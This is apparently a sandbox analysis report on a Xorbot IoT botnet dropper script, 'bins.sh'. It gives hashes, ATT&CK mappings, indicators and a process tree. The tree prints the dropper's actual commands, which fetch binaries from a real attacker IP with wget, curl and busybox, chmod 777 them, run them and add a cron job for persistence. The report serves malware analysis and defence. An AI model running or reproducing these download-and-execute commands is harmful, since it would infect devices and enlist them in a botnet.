xorbot | 597e7cab59f0e2ab31a3b5ef4eb810c2a44432ce958584a469a72f3146ead18a

Analysis

max time kernel
149s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
30-11-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

035d446476225e126ba207e9014700ff
SHA1

44658f5a8e83ad0e82a74736d80b6c7ab5c8784b
SHA256

597e7cab59f0e2ab31a3b5ef4eb810c2a44432ce958584a469a72f3146ead18a
SHA512

1d9a7fb9911a273178a07c668363c3c4ca845663db2fa4c09d8e6026e4460251cbe7df51f57312f1f302b5ff70a39410b2501d2d7f2ef5702a6f0fa2337d8f53
SSDEEP

96:XYYMabqAH2YCucR5ZSmqC5Zm48sz8oC1rz1EAYYMabqALAMquCucR5sZmqC5ZdEZ:XCk2fo4Zz8oirz1C+4X8oirz7h

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

Processes:

resource	yara_rule
behavioral2/files/fstream-6.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmod

pid	Process
690	chmod
704	chmod

Executes dropped EXE 2 IoCs

Processes:

lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4

ioc	pid	Process
/tmp/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu	691	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
/tmp/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4	705	9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4

Renames itself 1 IoCs

Processes:

lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu

pid	Process
692	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.IcDKbk	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu

description	ioc	Process
File opened for reading	/proc/830/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/846/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/837/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/888/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/898/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/307/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/848/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/881/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/842/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/851/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/884/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/714/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/806/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/26/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/773/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/816/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/891/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/862/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/144/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/796/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/800/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/803/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/834/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/82/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/716/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/825/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/868/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/872/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/873/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/886/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/8/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/654/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/663/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/699/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/859/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/3/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/277/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/739/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/734/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/741/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/760/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/821/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/849/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/13/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/655/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/769/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/899/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/1/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/16/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/23/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/707/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/900/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/41/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/42/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/715/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/744/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/879/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/905/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/175/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/746/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/782/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/867/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/904/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
File opened for reading	/proc/792/cmdline	lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlbusyboxbusyboxwget

description	ioc	Process
File opened for modification	/tmp/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu	curl
File opened for modification	/tmp/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu	busybox
File opened for modification	/tmp/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4	busybox
File opened for modification	/tmp/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:657
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:664
- /usr/bin/wget
  wget http://216.126.231.240/bins/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
  2⤵
  - Writes file to tmp directory
  PID:666
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:680
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
  2⤵
  - Writes file to tmp directory
  PID:688
- /bin/chmod
  chmod 777 lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
  2⤵
  - File and Directory Permissions Modification
  PID:690
- /tmp/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
  ./lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:691
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:693
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:694
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:695
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:696
- /bin/rm
  rm lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
  2⤵
  PID:698
- /usr/bin/wget
  wget http://216.126.231.240/bins/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
  2⤵
  PID:701
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
  2⤵
  PID:702
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
  2⤵
  - Writes file to tmp directory
  PID:703
- /bin/chmod
  chmod 777 9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
  ./9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
  2⤵
  - Executes dropped EXE
  PID:705
- /bin/rm
  rm 9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
  2⤵
  PID:706
- /usr/bin/wget
  wget http://216.126.231.240/bins/jW8SP7EoQVioALWnO8uuujvJeXWEYmyexS
  2⤵
  PID:707
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/jW8SP7EoQVioALWnO8uuujvJeXWEYmyexS
  2⤵
  PID:708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.IcDKbk

Filesize
210B

MD5
8bf24e92f15b6d97cf24f26c74e9cbcf

SHA1
a21a3011c2edef9f8274f6fe71190efe04ce9b0d

SHA256
aba6661ede12b6ec18c52f1cdf2f312b51f390f62f97f750de5b87df81eec1ec

SHA512
d155f752a8ec6f51cd14b6cafc4d5d366aba9e98cbd12ea2a393ee85a54da20bebb82940f3f3597bcbb6545cec65f8c946447d2af8970e9d1fbd5375306f85a5

Download Submit